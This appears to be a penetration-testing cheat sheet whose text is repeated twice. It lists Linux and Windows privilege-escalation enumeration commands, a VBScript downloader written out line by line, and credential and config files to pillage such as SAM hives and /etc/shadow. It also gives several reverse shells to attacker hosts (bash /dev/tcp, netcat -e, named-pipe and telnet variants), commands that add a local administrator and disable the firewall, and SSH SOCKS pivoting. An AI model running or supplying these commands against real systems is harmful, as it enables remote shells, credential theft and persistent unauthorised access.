Ryan Bentz sckalath

## linux_privesc
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs

## wget_vbs
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs

## linux_pillage
/apache/logs/access.log
/apache/logs/error.log
/bin/php.ini
/etc/alias
/etc/apache2/apache.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache/conf/httpd.conf
/etc/bash.bashrc
/etc/chttp.conf

## reverse_shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#bash alt
exec /bin/bash 0&0 2>&0

#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

#bash alt 3

## windows_privesc
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

## windows_crap
#add a user
net user ryan mwcb /add

#add user to local administrators
net localgroup administrators /add ryan

#remove firewall
netsh firewall set opmode disable

#enabled remote desktop

## windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini	This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system	This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system

## linux_blind
# Use these if you have a simple command shell through LFI or something similar.

/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile

## netcat_reverse_shell_backpipe
#1
nc <attacker_ip> <port> -e /bin/bash
#2
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#3
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
#4
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#5
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

## ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1

#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080

#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
	// Determine linux distribution and version
	cat /etc/issue
	cat /etc/*-release
	cat /etc/lsb-release
	cat /etc/redhat-release

	// Determine kernel version - 32 or 64-bit?
	cat /proc/version
	uname -a
	uname -mrs
	echo strUrl = WScript.Arguments.Item(0) > wget.vbs
	echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
	echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
	echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
	echo Err.Clear >> wget.vbs
	echo Set http = Nothing >> wget.vbs
	echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
	/apache/logs/access.log
	/apache/logs/error.log
	/bin/php.ini
	/etc/alias
	/etc/apache2/apache.conf
	/etc/apache2/conf/httpd.conf
	/etc/apache2/httpd.conf
	/etc/apache/conf/httpd.conf
	/etc/bash.bashrc
	/etc/chttp.conf
	#bash
	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

	#bash alt
	exec /bin/bash 0&0 2>&0

	#bash alt 2
	0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

	#bash alt 3
	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]
	#add a user
	net user ryan mwcb /add

	#add user to local administrators
	net localgroup administrators /add ryan

	#remove firewall
	netsh firewall set opmode disable

	#enabled remote desktop
	%SYSTEMDRIVE%\boot.ini
	%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\system
	%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
	%WINDIR%\repair\sam
	%WINDIR%\repair\system
	# Use these if you have a simple command shell through LFI or something similar.

	/etc/issue (A message or system identification to be printed before the login prompt.)
	/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
	/etc/passwd
	/etc/group
	/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
	/etc/shadow
	/home/[USERNAME]/.bash_history or .profile
	~/.bash_history or .profile
	#1
	nc <attacker_ip> <port> -e /bin/bash
	#2
	mknod backpipe p; nc <attacker_ip> <port> 0<backpipe \| /bin/bash 1>backpipe
	#3
	/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
	#4
	mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe \| /bin/bash 1>backpipe
	#5
	telnet <attacker_ip> <1st_port> \| /bin/bash \| telnet <attacker_ip> <2nd_port>
	##SOCKS Proxy##
	#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
	#Command line:
	ssh -D 127.0.0.1:1080 10.0.0.1

	#~/.ssh/config:
	Host 10.0.0.1
	DynamicForward 127.0.0.1:1080

	#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: